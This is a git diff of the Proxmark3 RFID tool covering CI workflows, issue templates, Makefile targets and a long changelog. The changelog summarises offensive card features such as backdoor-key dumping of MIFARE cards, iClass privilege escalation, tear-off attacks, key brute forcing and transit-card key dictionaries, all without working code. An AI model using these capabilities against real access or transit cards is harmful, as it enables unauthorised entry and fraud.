swapped from bigbuf malloc calls to calloc calls on device side. Now all allocations should start from a known state of memory

Support VC card reading by adding `--dfname` argument to more `mfdes` commands

.github/ISSUE_TEMPLATE/bug_report.md

@@ -21,6 +21,7 @@ Have you followed the instructions properly?  ie,  flashed bootrom seperately fi
 
 **Describe the bug**
 A clear and concise description of what the bug is.
+Please include text output of the bug happening.
 
 **To Reproduce**
 Steps to reproduce the behavior:
@@ -40,7 +41,7 @@ If applicable, add screenshots to help explain your problem.
  - inside proxmark3 client run the following commands and paste the output here.
  - hw version
  - hw status
- - data tune
+ - hw tune
 
 **Additional context**
 Add any other context about the problem here.

.github/ISSUE_TEMPLATE/checklist-for-release.md

@@ -31,9 +31,13 @@ Run `tools/release_tests.sh` on:
 - [ ] Kali
 - [ ] Debian Stable
 - [ ] Debian Testing
-- [ ] Ubuntu 22
+- [ ] Ubuntu 24.04 (LTS)
+- [ ] Ubuntu 24.10
+- [ ] Ubuntu 25.04
 - [ ] ParrotOS
-- [ ] Fedora 37
+- [ ] Fedora 41 (till 2025-11-19)
+- [ ] Fedora 42 (till 2026-05-13)
+- [ ] Fedora 43 (till 2026-12-02)
 - [ ] OpenSuse Leap
 - [ ] OpenSuse Tumbleweed
 - [ ] OSX (MacPorts)

.github/workflows/codeql-analysis.yml

@@ -12,6 +12,8 @@
 name: "CodeQL"
 
 on:
+  workflow_dispatch:
+
   push:
     branches: [ master ]
   pull_request:
@@ -41,7 +43,7 @@ jobs:
       run: sudo apt-get update
 
     - name: Install dependencies
-      run: sudo apt-get install -yqq make autoconf build-essential ca-certificates pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev python3 python3-dev libpython3-all-dev liblua5.2-dev liblua5.2-0 lua5.2 sed libssl-dev
+      run: sudo apt-get install -yqq make autoconf build-essential ca-certificates pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev python3 python3-dev libpython3-all-dev liblua5.4-dev liblua5.4-0 lua5.4 sed libssl-dev
 
     - name: Install Python dependencies
       run: |

.github/workflows/rebase.yml

@@ -2,6 +2,7 @@ on: pull_request_target
 name: Changelog Reminder
 jobs:
   remind:
+    if: github.repository_owner == 'RfidResearchGroup'
     name: Changelog Reminder
     runs-on: ubuntu-latest
     steps:

.github/workflows/ubuntu.yml

@@ -30,7 +30,7 @@ jobs:
         run: sudo apt-get update
 
       - name: Install dependencies
-        run: sudo apt-get install -yqq make autoconf build-essential ca-certificates pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev python3 python3-dev libpython3-all-dev liblua5.2-dev liblua5.2-0 lua5.2 sed libssl-dev libgd-dev
+        run: sudo apt-get install -yqq make autoconf build-essential ca-certificates pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev python3 python3-dev libpython3-all-dev liblua5.4-dev liblua5.4-0 lua5.4 sed libssl-dev libgd-dev
 
       - name: Install Python dependencies
         run: pip install -r tools/requirements.txt
@@ -60,7 +60,7 @@ jobs:
         run: sudo apt-get update
 
       - name: Install dependencies
-        run: sudo apt-get install -yqq make autoconf build-essential ca-certificates pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev python3 python3-dev libpython3-all-dev liblua5.2-dev liblua5.2-0 lua5.2 sed libssl-dev libgd-dev
+        run: sudo apt-get install -yqq make autoconf build-essential ca-certificates pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev python3 python3-dev libpython3-all-dev liblua5.4-dev liblua5.4-0 lua5.4 sed libssl-dev libgd-dev
 
       - name: Install Python dependencies
         run: pip install -r tools/requirements.txt
@@ -91,7 +91,7 @@ jobs:
         run: sudo apt-get update
 
       - name: Install dependencies
-        run: sudo apt-get install -yqq make autoconf build-essential ca-certificates pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev python3 python3-dev libpython3-all-dev liblua5.2-dev liblua5.2-0 lua5.2 sed libssl-dev libgd-dev
+        run: sudo apt-get install -yqq make autoconf build-essential ca-certificates pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev liblz4-dev libbluetooth-dev libpython3-dev python3 python3-dev libpython3-all-dev liblua5.4-dev liblua5.4-0 lua5.4 sed libssl-dev libgd-dev
 
       - name: Install Python dependencies
         run: pip install -r tools/requirements.txt

.github/workflows/uniq.yaml

@@ -18,5 +18,5 @@ jobs:
       - name: check unique keys in dic files
         shell: bash
         run: |
-          find . -type f -name "*.dic" | xargs -I {} sh -c "echo {} && cat {} | sed 's/ *#.*//;/^$/d' | sort | uniq -i -d -c | sort -n -r "
-          if [[ $(find . -type f -name "*.dic" | xargs -I {} sh -c "echo {} && cat {} | sed 's/ *#.*//;/^$/d' | sort | uniq -i -d -c | sort -n -r " | grep -v '^\./' | wc -l) -gt 0 ]]; then exit 1; fi
+          find . -type f -name "*.dic" | xargs -I {} sh -c "echo {} && cat {} | sed 's/ *#.*//;/^$/d' | sed 's/\(.*\)/\U\1/' | sort | uniq -i -d -c | sort -n -r "
+          if [[ $(find . -type f -name "*.dic" | xargs -I {} sh -c "echo {} && cat {} | sed 's/ *#.*//;/^$/d' | sed 's/\(.*\)/\U\1/' | sort | uniq -i -d -c | sort -n -r " | grep -v '^\./' | wc -l) -gt 0 ]]; then exit 1; fi

CHANGELOG.md

@@ -3,8 +3,214 @@ All notable changes to this project will be documented in this file.
 This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log...
 
 ## [unreleased][unreleased]
+- Changed from Bigbuf malloc to Bigbuf calloc calls on device side (@iceman1001)
+- Added `lf t55xx view` - now viewing of T55XX dump files is possible (@iceman1001)
+- Fixed `lf indala cone` - now writing the right bits when using `--fc` and `--cn`
+- Changed readline hack logic for async dbg msg to be ready for readline 8.3 (@doegox)
+- Improved To avoid conflicts with ModemManager on Linux, is recommended to masking the service (@grugnoymeme)
+- Changed `data crypto` - now also handles AES-256 (@iceman1001)
+- Changed `hf mfdes info` - add recognition of Swissbit iShield Key Mifare (@ah01)
+- Changed `hf mf info` - add detection for unknown backdoor keys and for some backdoor variants (@doegox)
+- Changed `mqtt` commnands - now honors preference settings (@iceman1001)
+- Changed `prefs` - now handles MQTT settings too (@iceman1001)
+- Fixed `mqtt` segfault and gdb warning under windows (proper thread stopping and socket handling). (@virtyvoid)
+- Added `mqtt` - the pm3 client can now send and receive MQTT messages or json files. (@iceman1001)
+- Changed `hf iclass wrbl` - replay behavior to use privilege escalation if the macs field is not passed empty(@antiklesys)
+- Changed `hf iclass restore` - it now supports privilege escalation to restore card content using replay (@antiklesys)
+- Fixed `hf 15 dump` - now reads sysinfo response correct (@iceman1001)
+- Changed `make clean` - it now removes all __pycache__ folders (@iceman1001)
+- Fixed `hf 15 readmulti` - fix block calculations (@iceman1001)
+- Changed `mem load` - now handles UL-C and UL-AES dictionary files (@iceman1001)
+- Changed `hf mfu sim` - now support UL-C simulation (@iceman1001)
+- Added `!` - run system commands from inside the client. Potentially dangerous if running client as SUDO, SU, ROOT (@iceman1001)
+- Implemented `hf felica scsvcode` - now dumps all service and area codes. (@zinongli)
+- Added `hf felica liteauth` - now support FeliCa Lite-S authentication(@q0jt)
+- Added `he felica dump` - partial support for dumping all blocks from unauth readable services (@zinongli)
+- Changed `hf 14b calypso` - now don't break the file id loop when one file can't be selected or read. Add new file ids to iterate through (@zinongli)
 
-## [Backdoor][2024-09-10]
+
+## [Daddy Iceman.4.20469][2025-06-16]
+- Fixed edge case in fm11rf08s key recovery tools (@doegox)
+- Removed `--par` from `lf em 4x70` commands.
+- Changed `hf 14a info` - refactored code to be able to detect card technology across the client easier (@iceman1001)
+- Changed `hf mf info` - now informs better if a different card technology is detected (@iceman1001)
+- Changed `hf mf autopwn` - now exits if desfire is detected and limit attacks if mifare plus is detected (@iceman1001)
+- Changed `hf mfp chk` - improved key handling and output (@iceman1001)
+- Fix `hf mf dump` - added a check for keyfile to contain enough keys for card (@iceman1001)
+- Fix `hf mf eview` - now viewing 2k, 4k cards doesn't get wrong background color (@iceman1001)
+- Changed `hf mf info` - skip checking if it detects a MIFARE Ultralight family card (@iceman1001)
+- Changed `hf mf rdsc` - it now addeds the used key to the output in the sector trailer (@iceman1001)
+- Added the `PM3ULTIMATE` platform in the build / docs. *untested* (@iceman1001)
+- Added fpga compilation for PM3ULTIMATE device (@n-hutton)
+- Updated the ATR list (@iceman1001)
+- Fixed fpga binary images to use fixed seed 2 (@n-hutton)
+- Added `hf iclass sam --info` - option that returns sam specific details (@antiklesys)
+- Changed `hf iclass sim -t 7` - implemented simulation that glitches key block responses (@antiklesys)
+- Changed `hf iclass sim -t 6` - implemented simulation that glitches sio block (@antiklesys)
+- Changed `hf iclass legbrute` - implemented multithreading support (@antiklesys)
+- Changed `hf iclass legrec` - added a --sl option for further speed increase by tweaking the communication delays (@antiklesys)
+- Changed `hf iclass legrec` - added a --fast option for further speed increase and automated AA2 block selection (@antiklesys)
+- Changed `hf iclass legrec` - additional code optimizations gaining a ~147% speed increase (@antiklesys)
+- Changed `hf iclass tear` - readability improvements for erase phase (@antiklesys)
+- Changed `hf iclass legrec` - code optimizations gaining a ~8% speed increase (@antiklesys)
+- Modified `hf iclass tear` - now has a device side implementation also. (@antiklesys) (@iceman1001)
+- Changed `hf iclass info` - now uses CSN values based checks (@antiklesys)
+- Changed `hf iclass dump` - now uses default AA1 key when called without a key or key index (@iceman1001)
+- Renamed `hf iclass trbl` to `hf iclass tear` (@iceman1001)
+- Changed `hw tearoff` - the device side message is now debug log controlled (@iceman1001)
+- Changed `pm3.sh` - Serial ports enumeration on Proxspace3.xx / MINGW environments,  now using powershell.exe since wmic is deprecated (@iceman1001)
+- Fixed `hf iclass trbl` - to correctly use the credit key when passed and show partial tearoff results (@antiklesys)
+- Fixed `hf iclass legbrute` was not correctly parsing the index value
+- Fixed `hf mf ekeyprn` - failed to download emulator memory due to wrong size calculation (@iceman1001)
+- Fixed `hf mf fchk --mem` to actually use flash dict (@doegox)
+- Fixed `make install` on OSX thanks DaveItsLong (@doegox)
+- Added new standalone mode `HF_ST25_TEAROFF` to store/restore ST25TB tags with tearoff for counters (@seclabz)
+- Added `hf_mfu_ultra.lua` script enables restoring dump to ULTRA/UL-5 tags and clearing previously written ULTRA tags (@mak-42)
+- Fixed `hf mfu sim` to make persistent the counter increases in the emulator memory (@sup3rgiu)
+- Fixed `hf mf mad` to correctly display MAD version 2 card publisher sector (@BIOS9)
+- Fixed `lf hitag dump` and related commands stability when tag is configured in public mode/TTF mode (@rfidgeek1337)
+
+## [Blue Ice.4.20142][2025-03-25]
+- Added `des_talk.py` script for easier MIFARE DESFire handling (@trigat)
+- Fixed `hf 14b info` - wrong endianess when looking for lock bits etc (@gentilkiwi)
+- Changed `hf mf autopwn` - tries to detect static encrypted nonces and also user cancel during chk keys (@iceman1001)
+- Changed `hf mf autopwn` - added option to use SPI flash dictionary (@jmichelp)
+- Changed `trace list -t seos` - now annotate ISO7816 (@iceman1001)
+- Updated aid and mad json files (@iceman1001)
+- Changed `hf 14a apdu` - now can be interrupted and dynamically adds time (@iceman1001)
+- Changed `trace list -t` - shortend the hitag types (@iceman1001)
+- Added Be-Tech identification (@iceman1001)
+- Added `lf em 410x clone --htu` clone EM410x ID to Hitag µ/8265 (@douniwan5788)
+- Added `lf hitag htu` support for Hitag µ/8265 (@douniwan5788)
+- Added `hf mfu aesauth` based on existing UL AES support (@doegox)
+- Changed `hf mfu sim` deny OTP changes with all zeros (@iceman1001)
+- Added missing file in CMakeLists.txt (@iceman1001)
+- Changed `lf em 4x70` internals on ARM side; Enabling improved debugging and reliability (@henrygab)
+- Improved `pcf7931` generic readability of the code. Unified datatypes and added documentation/explainations (@tinooo)
+- Improved `lf pcf7931` read code - fixed some checks for more stability (@tinooo)
+- Changed `trace list -t seos` - improved annotation (@iceman1001)
+- Added `make commands` to regenerate commands documentation files and autocompletion data independently of `make style` (@doegox)
+- Added texecom identification,  thanks @en4rab ! (@iceman1001)
+- Added `hf 15 slixprotectpage` command
+- Fixed `hf mf gload` - missing parameter (@iceman1001)
+- Changed `hf mf gload` - now handles 1k ev1 sized dumps (@iceman1001)
+- Changed wiegand format unpack functions to clear struct later (@iceman1001)
+- Changed `wiegand decode` - now accepts new padding format (@iceman1001)
+- Changed `mem spiffs tree` - ID is now shown in decimal (@iceman1001)
+- Added sample wiegand format 56bit (@iceman1001)
+- Changed Wiegand formats to include number of bits (@iceman1001)
+- Fixed compilation warning in hitagS (@iceman1001)
+- Added new wiegand format H800002 (@jmichelp)
+- Changed `Makefile.platform.sample` file - now have clear instructions for generating images for other proxmark3 hardware (@iceman1001)
+- Changed `doc/magic_cards_notes.md` - now contains documentation for iKey LLC's MF4 tag (@team-orangeBlue)
+- Changed `hf mf cload` - now accepts MFC Ev1 sized dumps (@iceman1001)
+- Changed `hf mfu info` - now properly identify ULEv1 AES 50pF (@iceman1001)
+- Changed `hf mf info` - now differentiates between full USCUID and cut down ZUID chips (@nvx)
+- Changed `lf hitag chk` - added key counter, client side abort and minor delay (@iceman1001)
+- Added `hf seos sam` - Added support for HID SAM SEOS communications (@jkramarz)
+- Changed the extended area accessible by spiffs into last page of FLASH (@piotrva)
+- Changed flash-stored key dictionaries (Mifare, iClass, T55XX) and T55XX configurations to SPIFFS files (@piotrva)
+- Changed `lf em 410x sim` to use default gap value of 0 and extended help (@piotrva)
+- Changed `hf 14a info` - now identifies MIAFRE Duox (@iceman1001)
+- Added `hf iclass trbl` to perform tear-off attacks on iClass (@antiklesys)
+- Added support for connection to host device in all Docker envs (@doegox)
+- Changed `hf 15 info` to show all type matches and check ST25TVxC signature (@doegox)
+- Added initial support for ST25TN and its signature verification (@doegox)
+- Changed originality checks handling to refactor code and pk data (@doegox)
+- Changed `uniq.yaml` workflow to be case-insensitive (@iceman1001)
+- Fixed `mem load --mfc` not erasing all SPI flash blocks after extending to 4095 keys (@piotrva)
+- Changed extended area for Mifare keys in SPI flash to hold 4095 keys (@piotrva)
+- Fixed DESFire D40 secure channel crypto (@nvx)
+- Fixed `hf mfp info` fix signature check on 4b UID cards (@doegox)
+- Changed `hf_mf_ultimatecard` - it now automatically set maximum read/write block when using predefined types (@piotrva)
+- Changed SPI flash detection to calculate the size instead of table lookup (@ANTodorov)
+- Changed `spi_flash_decode.py` script with more ICs (@ANTodorov)
+- Fixed `hf/lf tune` segfault when called from script (@doegox)
+- Changed `hf_mf_ultimatecard` - added option to set and get maximum read/write block number (@piotrva)
+- Added JEDEC information for SPI flash W25Q64JV (@ANTodorov)
+- Changed `hf iclass configcard` - added special iclass legacy config cards (@antiklesys)
+- Changed `hf iclass legrec` - added simulation function (@antiklesys)
+- Added keys from Momentum firmware projects. (@onovy)
+- Added Dutch Statistics Agency default key (@eagle00789)
+- Fixed Wiegand decode with hex input dropping the first bit (@emilyastranova)
+- Changed `hf mf autopwn` - now allows for custom suffix (@zxkmm)
+
+## [Orca.4.19552][2024-11-22]
+- Fixed `hf_legic.lua` - removed bit32 commands from the script (@diorch1968)
+- Fixed `mem spiffs tree` - now show correct symlink name (@ANTodorov)
+- Fixed `mem spiffs wipe` - reported file/link names is now correct  (@ANTodorov)
+- Updated atrs list (@iceman1001)
+- Added support for a new KDF (@iceman1001)
+- Added Inner range aid and mad entries (@iceman1001)
+- Changed `mem spiffs` - Use all available space in SPI flash (@ANTodorov)
+- Fixed `hf mf sim` - wrong size check in MifareSim (@iceman1001)
+- Fixed `hf mf sim` not to respond to authentication attempts for sectors out of bound for selected Mifare type (@piotrva)
+- Added option to build against non-default python3 with CMake as well (@doegox)
+- Added option to build against non-default python3 with Makefile (@ANTodorov)
+- Changed `hf 14a info` `hf mf info` - now detects FM1216-137 CPU cards (@iceman1001)
+- Changed `hf iclass configcard` - expanding the list of available options and functionalities (@antiklesys)
+- Fixed `intertic.py` - missing comma in array (@iceman1001)
+- Changed `hf iclass legrec` - improved algorithm leveraging reduced entropy from hash0 constraints (@antiklesys)
+- Fixed `hf iclass configcard` when generating elite or keyroll elite configcards for Rev.C legacy readers (@antiklesys)
+- Changed `hf mf c*` - now accepts a --gdm flag to write using uscuid/gdm 20/23 alt magic wakeup (@nvx)
+- Changed `pm3_console()` - Python/Lua/C: replace `passthru` by `capture` and `quiet` (@doegox)
+- Fixed `hf iclass list` - annotation crc handled better (@iceman1001)
+- Fixed `hf_mf_uscuid_prog.lua` - bad divisions and code style fixes (@iceman1001)
+- Changed `hf iclass info` - now checks for cards silicon version (@antiklesys)
+- Changed `hf iclass legrec` - updated script implementation to ensure functionality (@antiklesys)
+- Added recovered iclass custom key to dictionary (@antiklesys)
+- Added support for all Hitag S response protocol mode (@douniwan5788)
+- Fixed `hf_young` - flags declaration was missing a semicolon (@jakkpotts)
+- Changed `hf mf sim` - add option to allow key b to be used even if readable (@doegox)
+- Changed `data num` - outputed binary strings are now properly zero padded (@iceman1001)
+- Changed `hf iclass info` - now tries default keys and decode if legacy (@iceman1001)
+- Changed `hf iclass chk` - now loads dictionary file by default (@iceman1001)
+- Added Makefile variable `DONT_BUILD_NATIVE` in mfd_aes_brute Makefile to easify downstream package (@Cryolitia)
+- Auto detect whether compile option `march=native` is supported for mfd_aes_brute Makefile
+- Changed `hf mf sim` - support data-first and nested reader attacks (@doegox)
+- Fixed `lf search` and `lf em 4x50 rdbl -b <blk>` does not coredump reading EM4450 tag (@ANTodorov)
+- Fixed flashing - client doesnt fail every other flash attempt (@iceman1001)
+- Changed `pref show` - add option to dump as JSON (@doegox)
+- Changed `mf_backdoor_dump.py`- use faster ecfill/eview (@doegox)
+- Changed `hf mf ecfill` - wait for execution and return status (@doegox)
+- Changed `hf 14a reader` - added option to wait for a card (@doegox)
+- Changed `hf mf ecfill` - added support for quick dump via backdoor auth (@doegox)
+- Fixed `hf mf restore` - really skip strict ACLs unless --force (@doegox)
+- Added `hf 14b setuid` - set uid on magic 14b tag (@iceman1001)
+- Changed `hf 14b info` - now detect Tiananxin (@iceman1001)
+- Fixed `lf em 410x brute` - better filehandling and memory handling (@iceman1001)
+- Changed split PacketResponseNG status into status and reason (@douniwan5788)
+- Added `spi_flash_decode.py` - helper script to decode JEDEC data (@ANTodorov)
+- Changed `hw status` - now show SPI flash JEDEC Manufacturer ID and Device ID in output (@ANTodorov)
+- Changed `hf iclass configcards` to support generating config cards using a different key than the default k0 as the card's key (@antiklesys)
+- Added maur keys (@iceman1001)
+- Fixed `hf mfu pwdgen` for the 7 byte UID (@ANTodorov)
+- Added `hf iclass unhash` command to reverse an iclass diversified key to hash0 pre-images (@antiklesys)
+- Changed `hf 14a raw` - now supports crypto  (@doegox)
+- Changed `hw version` command to print LUA and Python versions (@jmichelp)
+- Updated LUA to v5.4.7 which adds utf-8 support (@jmichelp)
+- Moved `lf hitag sim --hts` -> `lf hitag hts sim` (@douniwan5788)
+- Removed `lf hitag read/write --hts` (@douniwan5788)
+- Changed `lf search` - it now tries to read and decode paxton id (@iceman1001)
+- Changed `lf search` - to identify hitag2/s/82xx in chipset detection to preserve their EM4100 or other outputs (@iceman1001)
+- Added `lf hitag hts reader` - to act as a HitagS / 82xx reader (@iceman1001)
+- Changed `lf hitag hts write` -> `lf hitag hts wdbl` to fit rest of client command names (@iceman1001)
+- Changed `lf hitag hts read` -> `lf hitag hts rdbl` to fit rest of client command names (@iceman1001)
+- Changed `hf mf info` - Better handling when printing ATS (@iceman1001)
+- Changed to also try the MFC_B key when extracting memory (@iceman1001)
+- Fixed `make -j check`  Thanks @elboulangero  (@iceman1001)
+- Added support for 8268/8310 (@douniwan5788)
+- Changed scripting string params to accept 1024 chars, Thanks @evildaemond! (@iceman1001)
+- Added detection for FM11NT021 (@iceman1001)
+- Added detection of a magic NTAG 215 (@iceman1001)
+- Fixed hardnested on AVX512F #2410 (@xianglin1998)
+- Added `hf 14a aidsim` - simulates a PICC and allows you to respond to specific AIDs and getData responses (@evildaemond)
+- Fixed arguments for `SimulateIso14443aTag` and `SimulateIso14443aInit` in `hf_young.c`, `hf_aveful.c`, `hf_msdsal.c`, `hf_cardhopper.c`, `hf_reblay.c`, `hf_tcprst.c` and `hf_craftbyte.c` (@archi)
+- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. (@Aptimex)
+- Added keys for Metro Q transit cards in Huston, TX. (@Anarchothulhu)
+- Added keys from MifareClassicTool and Flipper projects. (@onovy)
+
+## [Backdoor.4.18994][2024-09-10]
 - Changed flashing messages to be less scary (@iceman1001)
 - Fixed docker containers and their documentation (@doegox)
 - Fixed `hf ict` - buffer overflow (@doegox)
@@ -1672,7 +1878,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac
  - Added `lf t55xx recoverpw` - adds a new password recovery using bitflips and partial flips if password write went bad. (@alexgrin)
  - `hf legic` - added improved legic data mapping. (jason)
  - `hf mf mifare` - added possibility to target key A|B (@douniwan5788)
- - Added `analyse lcr` - added a new main command group,  to help analysing bytes & bits & nibbles. (@iceman1001)
+ - Added `analyse lrc` - added a new main command group,  to help analysing bytes & bits & nibbles. (@iceman1001)
  - Added `lf nedap` - added identification of a NEDAP tag. (@iceman1001)
  - `lf viking clone` - fixed a bug. (@iceman1001)
  - Added bitsliced bruteforce solver in `hf mf hardnested` (@Aczid)

Makefile

@@ -32,6 +32,9 @@ endif
 all clean install uninstall check: %: client/% bootrom/% armsrc/% recovery/% mfc_card_only/% mfc_card_reader/% mfd_aes_brute/% fpga_compress/% cryptorf/%
 # hitag2crack toolsuite is not yet integrated in "all", it must be called explicitly: "make hitag2crack"
 #all clean install uninstall check: %: hitag2crack/%
+clean: %: hitag2crack/%
+	find . -type d -name __pycache__ -exec rm -rfv \{\} +
+
 
 INSTALLTOOLS=mfc/pm3_eml2lower.sh mfc/pm3_eml2upper.sh mfc/pm3_mfdread.py mfc/pm3_mfd2eml.py mfc/pm3_eml2mfd.py pm3_amii_bin2eml.pl pm3_reblay-emulating.py pm3_reblay-reading.py
 INSTALLSIMFW=sim011.bin sim011.sha512.txt sim013.bin sim013.sha512.txt sim014.bin sim014.sha512.txt
@@ -114,10 +117,10 @@ cryptorf/check: FORCE
 	$(Q)$(BASH) tools/pm3_tests.sh $(CHECKARGS) $(patsubst %/check,%,$@)
 mfc_card_only/check: FORCE
 	$(info [*] CHECK $(patsubst %/check,%,$@))
-	$(Q)$(BASH) tools/pm3_tests.sh $(CHECKARGS) $(patsubst %/check,%,$@)
+	$(Q)$(BASH) tools/pm3_tests.sh $(CHECKARGS) nonce2key staticnested $(patsubst %/check,%,$@)
 mfc_card_reader/check: FORCE
 	$(info [*] CHECK $(patsubst %/check,%,$@))
-	$(Q)$(BASH) tools/pm3_tests.sh $(CHECKARGS) $(patsubst %/check,%,$@)
+	$(Q)$(BASH) tools/pm3_tests.sh $(CHECKARGS) mfkey mf_nonce_brute $(patsubst %/check,%,$@)
 mfd_aes_brute/check: FORCE
 	$(info [*] CHECK $(patsubst %/check,%,$@))
 	$(Q)$(BASH) tools/pm3_tests.sh $(CHECKARGS) $(patsubst %/check,%,$@)
@@ -204,6 +207,7 @@ help:
 	@echo "+ fpga_compress   - Make tools/fpga_compress"
 	@echo
 	@echo "+ style           - Apply some automated source code formatting rules"
+	@echo "+ commands        - Regenerate commands documentation files and autocompletion data"
 	@echo "+ check           - Run offline tests. Set CHECKARGS to pass arguments to the test script"
 	@echo "+ .../check       - Run offline tests against specific target. See above."
 	@echo "+ miscchecks      - Detect various encoding issues in source code"
@@ -263,8 +267,11 @@ ifeq ($(PLATFORM_CHANGED),true)
 	$(Q)$(MAKE) --no-print-directory -C bootrom clean
 	$(Q)$(MAKE) --no-print-directory -C armsrc clean
 	$(Q)$(MAKE) --no-print-directory -C recovery clean
-	$(Q)$(MAKE) --no-print-directory -C client clean
 	$(Q)$(MAKE) --no-print-directory -C tools/fpga_compress clean
+# clean the client only if PLATFORM got changed from or to PM3ICOPYX
+ifeq (PM3ICOPYX,$(filter PM3ICOPYX, $(PLATFORM) $(CACHED_PLATFORM)))
+	$(Q)$(MAKE) --no-print-directory -C client clean
+endif
 	$(Q)$(ECHO) CACHED_PLATFORM=$(PLATFORM) > .Makefile.options.cache
 	$(Q)$(ECHO) CACHED_PLATFORM_EXTRAS=$(PLATFORM_EXTRAS) >> .Makefile.options.cache
 	$(Q)$(ECHO) CACHED_PLATFORM_DEFS=$(PLATFORM_DEFS) >> .Makefile.options.cache
@@ -303,27 +310,28 @@ endif
 # easy printing of MAKE VARIABLES
 print-%: ; @echo $* = $($*)
 
-style:
+style: commands
 	# Make sure astyle is installed
 	@command -v astyle >/dev/null || ( echo "Please install 'astyle' package first" ; exit 1 )
 	# Remove spaces & tabs at EOL, add LF at EOF if needed on *.c, *.h, *.cpp. *.lua, *.py, *.pl, Makefile, *.v, pm3
-	find . \( -not -path "./cov-int/*" -and -not -path "./fpga*/xst/*" -and \( -name "*.[ch]" -or \( -name "*.cpp" -and -not -name "*.moc.cpp" \) -or -name "*.lua" -or -name "*.py" -or -name "*.pl" -or -name "Makefile" -or -name "*.v" -or -name "pm3" \) \) \
-	    -exec perl -pi -e 's/[ \t]+$$//' {} \; \
-	    -exec sh -c "tail -c1 {} | xxd -p | tail -1 | grep -q -v 0a$$" \; \
-	    -exec sh -c "echo >> {}" \;
+	find . \( -not -path "./cov-int/*" -and -not -path "./fpga*/xst/*" -and -not -path "./venv*" -and \( -name "*.[ch]" -or \( -name "*.cpp" -and -not -name "*.moc.cpp" \) -or -name "*.lua" -or -name "*.py" -or -name "*.pl" -or -name "Makefile" -or -name "*.v" -or -name "pm3" \) \) \
+		-exec perl -pi -e 's/[ \t]+$$//' {} \; \
+		-exec sh -c "tail -c1 {} | xxd -p | tail -1 | grep -q -v 0a$$" \; \
+		-exec sh -c "echo >> {}" \;
 	# Apply astyle on *.c, *.h, *.cpp
-	find . \( -not -path "./cov-int/*" -and \( \( -name "*.[ch]" -and -not -name "ui_overlays.h" \) -or \( -name "*.cpp" -and -not -name "*.moc.cpp" \) \) \) -exec astyle --formatted --mode=c --suffix=none \
-	    --indent=spaces=4 --indent-switches \
-	    --keep-one-line-blocks --max-instatement-indent=60 \
-	    --style=google --pad-oper --unpad-paren --pad-header \
-	    --align-pointer=name {} \;
+	find . \( -not -path "./cov-int/*" -and -not -path "./venv*" -and \( \( -name "*.[ch]" -and -not -name "ui_overlays.h" \) -or \( -name "*.cpp" -and -not -name "*.moc.cpp" \) \) \) -exec astyle --formatted --mode=c --suffix=none \
+		--indent=spaces=4 --indent-switches \
+		--keep-one-line-blocks --max-continuation-indent=60 \
+		--style=google --pad-oper --unpad-paren --pad-header \
+		--align-pointer=name {} \;
+
+commands: client
 	# Update commands.md
 	[ -x client/proxmark3 ] && client/proxmark3 -m | tr -d '\r' > doc/commands.md
 	# Make sure python3 is installed
 	@command -v python3 >/dev/null || ( echo "Please install 'python3' package first" ; exit 1 )
 	# Update commands.json, patch port in case it was run under Windows
 	[ -x client/proxmark3 ] && client/proxmark3 --fulltext | sed 's#com[0-9]#/dev/ttyACM0#'|python3 client/pyscripts/pm3_help2json.py - - | tr -d '\r' > doc/commands.json
-
 	# Update the readline autocomplete autogenerated code
 	[ -x client/proxmark3 ] && client/proxmark3 --fulltext | python3 client/pyscripts/pm3_help2list.py - - | tr -d '\r' > client/src/pm3line_vocabulary.h
 
@@ -341,7 +349,7 @@ miscchecks:
 # Make sure recode is installed
 	@command -v recode >/dev/null || ( echo "Please install 'recode' package first" ; exit 1 )
 	@echo "Files with suspicious chars:"
-	@find . \( -not -path "./cov-int/*" -and -not -path "./client/deps/*" -and \( -name "*.[ch]" -or -name "*.cpp" -or -name "*.lua" -or -name "*.py" -or -name "*.pl" -or -name "Makefile" -or -name "*.v" -or -name "pm3" \) \) \
+	@find . \( -not -path "./cov-int/*" -and -not -path "./client/deps/*" -and -not -path "./venv*" -and \( -name "*.[ch]" -or -name "*.cpp" -or -name "*.lua" -or -name "*.py" -or -name "*.pl" -or -name "Makefile" -or -name "*.v" -or -name "pm3" \) \) \
 	      -exec sh -c "cat {} |recode utf8.. >/dev/null || echo {}" \;
 ifneq (,$(EDIT))
 	@echo "Files with tabs: (EDIT enabled, files will be rewritten!)"
@@ -349,7 +357,7 @@ else
 	@echo "Files with tabs: (rerun with EDIT=1 if you want to convert them with vim)"
 endif
 # to remove tabs within lines, one can try with: vi $file -c ':set tabstop=4' -c ':set et|retab' -c ':wq'
-	@find . \( -not -path "./cov-int/*" -and -not -path "./client/deps/*" -and -not -wholename "./client/src/pm3_*wrap.c" -and \( -name "*.[ch]" -or \( -name "*.cpp" -and -not -name "*.moc.cpp" \) -or -name "*.lua" -or -name "*.py" -or -name "*.pl" -or -name "*.md" -or -name "*.txt" -or -name "*.awk" -or -name "*.v" -or -name "pm3" \) \) \
+	@find . \( -not -path "./cov-int/*" -and -not -path "./client/deps/*" -and -not -path "./venv*" -and -not -wholename "./client/src/pm3_*wrap.c" -and \( -name "*.[ch]" -or \( -name "*.cpp" -and -not -name "*.moc.cpp" \) -or -name "*.lua" -or -name "*.py" -or -name "*.pl" -or -name "*.md" -or -name "*.txt" -or -name "*.awk" -or -name "*.v" -or -name "pm3" \) \) \
 	      -exec sh -c "$(TABSCMD)" \;
